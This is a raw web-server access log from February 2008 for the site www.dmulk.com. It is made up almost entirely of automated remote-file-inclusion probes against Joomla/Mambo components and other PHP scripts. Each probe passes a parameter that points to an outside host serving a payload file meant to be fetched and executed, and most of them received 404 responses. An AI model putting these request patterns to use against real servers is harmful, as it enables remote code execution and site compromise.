200.21.85.101 - - [17/Feb/2008:11:19:13 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:11:19:24 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:11:20:14 -0800] "GET /about.php?baseDir=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:11:20:15 -0800] "GET /logs/about.php?baseDir=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:11:20:46 -0800] "GET /file.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:11:20:46 -0800] "GET /logs/file.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.30.179.235 - - [17/Feb/2008:11:20:47 -0800] "GET /bikes/CreSTOC07/?M=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.144.235 - - [17/Feb/2008:11:21:09 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [17/Feb/2008:11:21:09 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [17/Feb/2008:11:21:09 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [17/Feb/2008:11:21:23 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.120.148.82 - - [17/Feb/2008:11:22:59 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dagenk.tripod.com/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:11:23:00 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.120.148.82 - - [17/Feb/2008:11:23:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dagenk.tripod.com/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:23:46 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:24:38 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:24:38 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:11:25:39 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:26:49 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:26:49 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:26:49 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:11:26:53 -0800] "GET /logs//modules/SPChat/images/12.php?teste=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:11:26:53 -0800] "GET //modules/SPChat/images/12.php?teste=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:27:04 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:11:27:06 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
220.229.60.4 - - [17/Feb/2008:11:27:23 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:27:29 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.243.54.131 - - [17/Feb/2008:11:27:40 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:11:27:44 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:11:27:44 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.32 - - [17/Feb/2008:11:29:14 -0800] "GET /bikes/GPS/?D=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:11:29:31 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:11:29:32 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:30:16 -0800] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:30:16 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:30:17 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [17/Feb/2008:11:30:50 -0800] "GET /index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.60.64.18 - - [17/Feb/2008:11:30:50 -0800] "GET /logs/index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.243.54.131 - - [17/Feb/2008:11:32:59 -0800] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [17/Feb/2008:11:33:00 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [17/Feb/2008:11:33:03 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
207.58.184.150 - - [17/Feb/2008:11:33:32 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [17/Feb/2008:11:33:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [17/Feb/2008:11:33:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [17/Feb/2008:11:34:26 -0800] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:11:35:40 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:11:35:40 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:11:35:41 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:36:15 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://hellinsoloradio.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.216.24 - - [17/Feb/2008:11:36:29 -0800] "GET //inc/download_center_lite.inc.php?script_root=http://theninjalegion.com/etc/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.193.216.24 - - [17/Feb/2008:11:36:29 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://theninjalegion.com/etc/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:38:13 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:38:14 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:38:15 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:39:03 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:39:03 -0800] "GET //main.php?sayfa=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:11:39:03 -0800] "GET /logs//main.php?sayfa=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.20 - - [17/Feb/2008:11:39:13 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
67.15.12.20 - - [17/Feb/2008:11:39:14 -0800] "GET //inc/download_center_lite.inc.php?script_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:11:39:50 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.11 - - [17/Feb/2008:11:40:10 -0800] "GET /logs/access_070801.log HTTP/1.0" 200 22773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:11:40:38 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:11:40:38 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:40:55 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:11:40:55 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:41:20 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:41:21 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:41:21 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:42:36 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:42:36 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:42:36 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:42:37 -0800] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.95 - - [17/Feb/2008:11:42:41 -0800] "GET /logs/access_071228.log/index.php?sub=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [17/Feb/2008:11:42:41 -0800] "GET /index.php?sub=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [17/Feb/2008:11:42:42 -0800] "GET /logs/index.php?sub=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:43:24 -0800] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:43:24 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:43:24 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:43:26 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:11:43:43 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:11:43:43 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:11:43:44 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.253.51.34 - - [17/Feb/2008:11:43:44 -0800] "GET //index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.lignedenuit.fr/components/com_user/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.51.34 - - [17/Feb/2008:11:43:56 -0800] "GET /logs//index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.lignedenuit.fr/components/com_user/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.85.101 - - [17/Feb/2008:11:44:11 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.51.34 - - [17/Feb/2008:11:44:16 -0800] "GET /logs/access_080131.log//index.php?option=com_glossary&func=display&Itemid=9&catid=7/index.php?option=com_glossary&Itemid=1&mosConfig_absolute_path=http://www.lignedenuit.fr/components/com_user/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:11:44:24 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:11:44:24 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:11:44:42 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:44:56 -0800] "GET /logs/access.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:44:56 -0800] "GET /modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:44:56 -0800] "GET /logs/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /logs/access.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /logs/access.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /logs/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:44:58 -0800] "GET /logs/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:45:00 -0800] "GET /logs/access.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:45:12 -0800] "GET /logs/access_080131.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:45:13 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:45:13 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.161.16 - - [17/Feb/2008:11:45:14 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.180.57 - - [17/Feb/2008:11:45:18 -0800] "GET /logs/access_080106.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [17/Feb/2008:11:45:24 -0800] "GET /logs/access_080106.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:45:27 -0800] "GET /logs/access_080106.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.252 - - [17/Feb/2008:11:45:29 -0800] "GET /logs/access_080106.log/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:45:59 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://hellinsoloradio.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:11:45:59 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://hellinsoloradio.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
